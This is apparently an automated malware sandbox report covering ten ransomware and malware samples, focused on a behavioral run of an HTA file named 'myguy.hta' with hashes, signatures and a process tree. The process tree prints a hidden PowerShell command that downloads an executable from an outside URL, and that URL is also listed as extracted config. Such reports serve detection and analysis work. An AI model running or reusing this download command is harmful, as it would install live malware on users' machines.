Overview
overview
10Static
static
3cerber.exe
windows7-x64
10cryptowall.exe
windows7-x64
9jigsaw.exe
windows7-x64
10Locky.exe
windows7-x64
10131.exe
windows7-x64
1Matsnu-MBR...3 .exe
windows7-x64
7027cc450ef...d9.dll
windows7-x64
10027cc450ef...ju.dll
windows7-x64
10myguy.hta
windows7-x64
10svchost.exe
windows7-x64
7Resubmissions
05-08-2024 22:23
240805-2ba2rathle 1027-04-2024 00:38
240427-ay3xhafc53 1020-04-2024 05:28
240420-f6ht7aad5w 10Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27-04-2024 00:38
Static task
static1
Behavioral task
behavioral1
Sample
cerber.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
cryptowall.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
jigsaw.exe
Resource
win7-20240419-en
Behavioral task
behavioral4
Sample
Locky.exe
Resource
win7-20240220-en
Behavioral task
behavioral5
Sample
131.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
027cc450ef5f8c5f653329641ec1fed9.dll
Resource
win7-20240215-en
Behavioral task
behavioral8
Sample
027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll
Resource
win7-20240220-en
Behavioral task
behavioral9
Sample
myguy.hta
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
svchost.exe
Resource
win7-20240221-en
General
-
Target
myguy.hta
-
Size
13KB
-
MD5
0487382a4daf8eb9660f1c67e30f8b25
-
SHA1
736752744122a0b5ee4b95ddad634dd225dc0f73
-
SHA256
ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6
-
SHA512
e1e7d81d54efd526139ea8ac792ed2035c8e70f040319c0b65f723431d31077c7a6927553890c99151f2354f51c4020ed94e0e2e5d56386c2fc4828e95869106
-
SSDEEP
192:ScIsmNvaHz65bP/U/njs3NH0Z0UvDVE6Az6XVHBycT6iLMUpJ2seCYHlfeb:SPXTmnjs3BU9A27BNLMUTb
Malware Config
Extracted
http://french-cooking.com/myguy.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 2060 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2060 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
mshta.exedescription pid process target process PID 2276 wrote to memory of 2060 2276 mshta.exe powershell.exe PID 2276 wrote to memory of 2060 2276 mshta.exe powershell.exe PID 2276 wrote to memory of 2060 2276 mshta.exe powershell.exe PID 2276 wrote to memory of 2060 2276 mshta.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\7694.exe');2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060